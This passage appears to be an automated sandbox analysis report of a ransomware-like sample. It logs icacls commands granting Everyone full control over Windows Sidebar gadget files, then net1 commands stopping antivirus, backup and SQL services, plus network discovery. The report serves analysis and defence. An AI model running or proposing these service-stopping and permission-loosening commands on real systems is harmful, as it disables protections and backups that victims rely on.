C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_hail.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_sun.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_rainy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\grayStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\info.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_thunderstorm.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_snow.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_sun.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_few-showers.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_hail.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)alertIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)grayStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)notConnectedStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)redStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)redStateIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\weather.html /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\highDpiImageSwap.js /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\settings.js /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\localizedSettings.css /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\settings.css /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\icon.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\logo.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\blank.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_down.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_hov.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_rest.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "725748691239067323-122702008-1307471571885757774-2420430641372345049926525775"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "12667056481007494075-1868767552335074999-104463200721794746775398578696083361"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-935846506-1448055547-10590740362033437277142378661542019738-548533467-2078081017"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y2⤵
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1402425276-1262846531-753426617823567830-425840878-1900194323-13404454-1394668295"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "5132019348537584661726966978-924625645-1344031456-15347023038324381131771433955"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y2⤵
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "639434544-170845169-714305229-1972665247-18045425061268845676500973794-1619738093"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-731921879-233424031-1893917296-7678506051508732867-104866778780462561-233515153"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y2⤵
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1502495869-1963889123-71243265821275041241654390377-12095105341954021804-1693386539"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y2⤵
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1753774318-1612344226-18754265631422145440-14257020092079009772-160388196-78890023"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-154024844614655140425163984-935945900-130157635413575380181303058019-426448567"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11930111043623738472048690218-306605758-582667124180981061870609646475389184"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1125032842-194171679-674693773-472067840277642225373389868-1638419295534757093"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-677582844-1153644650-14090193131886973153-13461065971020744358-1030206384572606440"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1268730633713398606319881631-1680200151279496155-1108862252-719301590150501228"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "742258148-1141508708523392377-1921232-946000850-1873500859-816136616367760642"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-754275611-4514220741041223864-855228349126330378617029593561815539589734430777"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1539866428-2135890031-1818076980-2705003125343666741373198000-573746587700852296"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1759676714-653881508-847623814139153591-8522801482089960032-5525321351085703489"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "100917001570404118-3386768601146745916170672509216302413-762583699102091652"1⤵
-
C:\Windows\system32\net.exenet view1⤵
- Discovers systems in the same network
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9127398501038600140-2073572548-461146719-1895356445-15493323117578974481622989012"1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB